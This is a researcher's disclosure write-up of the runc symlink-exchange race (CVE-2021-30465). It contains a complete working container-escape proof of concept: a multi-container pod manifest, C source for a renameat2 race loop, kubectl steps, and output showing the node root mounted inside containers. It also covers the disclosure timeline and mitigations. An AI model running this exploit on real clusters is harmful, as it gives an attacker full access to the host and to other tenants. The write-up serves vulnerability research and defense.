# runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

It's November 2020 and I'm troubleshooting a container running on K8S that is doing tons of writes to the local disk.
As those writes are just temporary state, I quickly add an `emptyDir` `tmpfs` volume at `/var/run`,
open a ticket so that my devs make it permanent, and call it a day.

Some time later I notice, looking at the `mount` output, that this new `tmpfs` is mounted at `/run` instead of `/var/run`,
which I missed earlier but surprises me a bit. `/var/run` is a symlink to `../run`, and
after a quick test, having `mount` follow symlinks is actually the normal Linux behavior,
so I start wondering how containerd/runc makes sure the mounts stay inside the container rootfs.

After following the code responsible for the mounts, I end up reading the comment of [`securejoin.SecureJoinVFS()`](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60):
```
// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.
```
As you read this, you know that the race condition exists; the question is how to exploit it to escape to the K8S host.

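Before the POC, here is the race in miniature: a standalone demo of mine, separate from the exploit (the names `safe` and `evil` are arbitrary, and it assumes glibc 2.28+ for the `renameat2()` wrapper). It resolves a path while it is a plain directory, atomically swaps it for a symlink, and resolves the same name again.
```c
/* toctou_demo.c -- the check/use window in a single process.
 * In the real attack the RENAME_EXCHANGE runs in a loop in another
 * process, racing against runc. Build: gcc toctou_demo.c -o demo */
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void) {
    mkdir("safe", 0755);   /* what the check will see        */
    symlink("/", "evil");  /* where the attacker wants to go */

    char buf[PATH_MAX];
    /* CHECK: "safe" is a plain directory right now */
    printf("checked: %s\n", realpath("safe", buf));

    /* the attacker's atomic swap */
    renameat2(AT_FDCWD, "safe", AT_FDCWD, "evil", RENAME_EXCHANGE);

    /* USE: the same name now goes through the symlink to / */
    printf("used:    %s\n", realpath("safe", buf));
    return 0;
}
```
Run in an empty scratch directory, it prints the directory's real path first and `/` second. runc hits the same window, except its "use" step is `mount()`.
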
## POC

When mounting a volume, runc trusts the source and will let the kernel follow symlinks, but it doesn't trust the target argument: it uses the `filepath-securejoin` library to resolve any symlink and ensure the resolved target stays inside the container root.
As explained in the [SecureJoinVFS() documentation](https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57-L60), using this function is only safe if you know that the checked file is not going to be replaced by a symlink; the problem is that we can replace it with one.
In K8S there is a trivial way to control the target: create a pod with multiple containers sharing some volumes, one with a correct image and the others with non-existent images so they don't start right away.

Let's start with the POC first and the explanations after.

1. Create our attack pod:

```
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: attack
spec:
  terminationGracePeriodSeconds: 1
  containers:
  - name: c1
    image: ubuntu:latest
    command: [ "/bin/sleep", "inf" ]
    env:
    - name: MY_POD_UID
      valueFrom:
        fieldRef:
          fieldPath: metadata.uid
    volumeMounts:
    - name: test1
      mountPath: /test1
    - name: test2
      mountPath: /test2
$(for c in {2..20}; do
cat <<EOC
  - name: c$c
    image: donotexists.com/do/not:exist
    command: [ "/bin/sleep", "inf" ]
    volumeMounts:
    - name: test1
      mountPath: /test1
$(for m in {1..4}; do
cat <<EOM
    - name: test2
      mountPath: /test1/mnt$m
EOM
done
)
    - name: test2
      mountPath: /test1/zzz
EOC
done
)
  volumes:
  - name: test1
    emptyDir:
      medium: "Memory"
  - name: test2
    emptyDir:
      medium: "Memory"
EOF
```

2. Compile race.c, a simple binary that keeps swapping a directory and a symlink via `renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE)`. The swap is atomic: at any instant each name is either the directory or the symlink, never missing:

```
cat > race.c <<'EOF'
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    /* create the directory and the symlink; they may already exist
       if we were restarted, so failures are not fatal */
    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        // do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        // do not exit
    }

    /* atomically exchange the directory and the symlink, forever */
    while (1) {
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
    }
}
EOF

gcc race.c -O3 -o race
```

3. Wait for container c1 to start, upload the 'race' binary to it, and exec bash:

```
sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 -- bash
```

You now have a shell in container c1.

4. Create the following symlink (explanations later):

```
ln -s / /test2/test2
```

5. Launch 'race' multiple times to try to exploit this TOCTOU:

```
cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
```

6. Now that everything is ready, in a second shell, update the images so that the other containers can start:

```
for c in {2..20}; do
  kubectl set image pod attack c$c=ubuntu:latest
done
```

7. Wait a bit and look at the results:

```
for c in {2..20}; do
  echo ~~ Container c$c ~~
  kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
done
```

```
~~ Container c2 ~~
test2
~~ Container c3 ~~
test2
~~ Container c4 ~~
test2
~~ Container c5 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c6 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
test2
~~ Container c9 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c10 ~~
test2
~~ Container c11 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c12 ~~
test2
~~ Container c13 ~~
test2
~~ Container c14 ~~
test2
~~ Container c15 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
test2
```

On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some containers failed to start, and the remaining ones were not affected.

Even without the ability to update images, we could use a fast registry for c1 and a slow registry or a big image for c2+; we just need c1 to start one second before the others.

Tests were done on the following GKE cluster:
```
gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes
```

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

## Explanations

I haven't dug too deep into the code and relied on strace to understand what was happening, and I did the investigation about a month before finally getting a working POC, so details are fuzzy, but here is my understanding:

1. K8S prepares all the volumes for the pod in `/var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME`
(in my POC I'm using the fact that the path is known, but looking at `/proc/self/mountinfo` leaks all you need to find it; see the first sketch after this list)

2. containerd prepares the rootfs at `/run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs`

3. runc calls `unshare(CLONE_NEWNS)` and sets the mount propagation to `MS_SLAVE`, thus preventing the following mount operations from affecting other containers or the node directly

4. runc bind mounts the K8S volumes (illustrated in the second sketch below):
   1. runc calls `securejoin.SecureJoin()` to resolve the destination/target
   2. runc calls `mount()`
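
About the `/proc/self/mountinfo` remark in step 1: a hypothetical helper (my illustration, not part of the POC) could simply scan for entries exposing a `/var/lib/kubelet/pods/<uid>/...` host path; the assumption here is that some bind mount, typically the kubelet-managed `/etc/hosts`, shows that path in its mount root column.
```c
/* mountinfo_leak.c -- hypothetical helper, NOT part of the original POC:
 * scan /proc/self/mountinfo for entries that expose a
 * /var/lib/kubelet/pods/<uid>/... host path (the kubelet-managed
 * /etc/hosts bind mount is a typical giveaway). */
#include <stdio.h>
#include <string.h>

int main(void) {
    FILE *f = fopen("/proc/self/mountinfo", "r");
    if (!f) { perror("fopen"); return 1; }
    char line[4096];
    while (fgets(line, sizeof(line), f))
        if (strstr(line, "/var/lib/kubelet/pods/"))
            fputs(line, stdout); /* the mount root column holds the path */
    fclose(f);
    return 0;
}
```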
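
And here is my reading of steps 3 and 4, condensed into a C sketch. runc is written in Go and really uses `securejoin.SecureJoin()`; `secure_join()` below is a crude stand-in (it does not scope symlink resolution to the rootfs), and the point is only the check-then-use shape, not runc's actual code.
```c
/* pseudo_runc.c -- simplified sketch of the vulnerable sequence.
 * Needs root to actually perform the mounts. */
#define _GNU_SOURCE
#include <limits.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mount.h>

/* stand-in for securejoin.SecureJoin(): resolve dest under rootfs.
 * Either way, the result is only a string. */
static char *secure_join(const char *rootfs, const char *dest) {
    char buf[PATH_MAX];
    snprintf(buf, sizeof(buf), "%s/%s", rootfs, dest);
    return realpath(buf, NULL);
}

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s rootfs src dest\n", argv[0]);
        return 1;
    }

    /* step 3: private mount namespace with slave propagation, so the
     * following mounts stay invisible to the host namespace */
    if (unshare(CLONE_NEWNS) < 0 ||
        mount("", "/", NULL, MS_SLAVE | MS_REC, NULL) < 0) {
        perror("namespace setup");
        return 1;
    }

    /* step 4.1: CHECK -- resolve the destination to a plain string */
    char *resolved = secure_join(argv[1], argv[3]);
    if (!resolved) { perror("secure_join"); return 1; }

    /* step 4.2: USE -- if a component of `resolved` was swapped with a
     * symlink since the check, mount() happily follows it */
    if (mount(argv[2], resolved, NULL, MS_BIND | MS_REC, NULL) < 0) {
        perror("mount");
        return 1;
    }
    printf("bind mounted %s -> %s\n", argv[2], resolved);
    return 0;
}
```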

K8S doesn't give us control over the mount source, but we have full control over the target of the mount,
so the trick is to mount a directory containing a symlink over the K8S volumes path, to have the next mount use this new source and give us access to the node root filesystem.

From the node, the filesystem looks like this:
```
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /
```

Our `race` binary is constantly swapping `mntX` and `mnt-tmpX`. When c2+ start, they perform the following mount:
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)
```
which is equivalent to
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
```
as the volume is bind mounted into the container rootfs.

If we are lucky, when runc calls `SecureJoin()`, `mntX` is a directory, and by the time it calls `mount()`, `mntX` has become a symlink; as `mount()` follows symlinks, this gives us
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
```

The filesystem now looks like
```
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /
```

When we do the final mount
```
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
```
it resolves to
```
mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
```

And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlays of other containers, everything :)

## Workaround

A possible workaround is to forbid mounting volumes inside other volumes, but as usual, upgrading is the recommended fix.

## Comments

This POC is far from optimal and, as already stated, being able to update the image is not mandatory.

It took me a few tries to get a working POC. At first I was trying to simply mount the `tmpfs` volume over a host path (`/root/.ssh`),
but this doesn't work: the mounts happen in a new mount namespace (with the right mount propagation set), so they are not visible in the host mount namespace.
I then tried a Go version of the race binary, 4 containers and 20 volumes, and it always failed. I switched to a C version (not sure it makes a difference), 19 containers and 4 mounts, and this worked, giving me 6 containers out of 19 with the host root mounted.

Even with newer syscalls like `openat2()`, you still need to `mount(/proc/self/fd/X, /proc/self/fd/Y)` to be race-free. I'm not sure how useful a new mount flag that fails when one of the parameters is a symlink would be, but the current behavior is a huge footgun.
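
As an illustration of that idea (my sketch, not runc's actual fix; it assumes Linux 5.6+ and headers defining `SYS_openat2`, and `/path/to/rootfs` and `test1/mntX` are placeholders), the destination can be pinned with `openat2()` and then addressed through `/proc/self/fd`:
```c
/* openat2_pin.c -- sketch: pin the mount destination race-free. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/openat2.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void) {
    int rootfs = open("/path/to/rootfs", O_PATH | O_DIRECTORY | O_CLOEXEC);
    if (rootfs < 0) { perror("open rootfs"); return 1; }

    struct open_how how = {
        .flags   = O_PATH | O_CLOEXEC,
        /* resolve strictly under rootfs and refuse any symlink */
        .resolve = RESOLVE_IN_ROOT | RESOLVE_NO_SYMLINKS,
    };
    long dst = syscall(SYS_openat2, rootfs, "test1/mntX", &how, sizeof(how));
    if (dst < 0) { perror("openat2"); return 1; }

    /* the fd pins the inode: mounting onto /proc/self/fd/<dst> cannot
     * be redirected by a later symlink swap of the path components */
    char dstpath[64];
    snprintf(dstpath, sizeof(dstpath), "/proc/self/fd/%ld", dst);
    printf("mount(src, \"%s\", ...) would now be race-free\n", dstpath);
    return 0;
}
```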

This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc; that constraint was added later by K8S.
You can sometimes read that K8S is multi-tenant, but you have to understand this as multiple trusted teams, not as giving API access to strangers.

On February 24th, 2021, Google introduced GKE Autopilot: fully managed K8S clusters with an emphasis on security and, in theory, no access to the node. So after testing, I also reported the issue to them.

## Timeline

* 2020-11-??: Discover `SecureJoinVFS()` comment
* 2020-12-26: Initial report to [email protected] (Merry Christmas :) )
* 2020-12-27: Report acknowledgment
* 2021-03-06: Report to Google for their new GKE Autopilot
* 2021-04-07: Got added to discussions around the fix
* 2021-04-08: Google bounty :) (to be donated to Handicap International)
* 2021-05-19: End of embargo, advisory published on [GitHub](https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r) and on [OSS-Security](https://www.openwall.com/lists/oss-security/2021/05/19/2)
* 2021-05-30: Write-up + POC public

## Acknowledgments

Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.
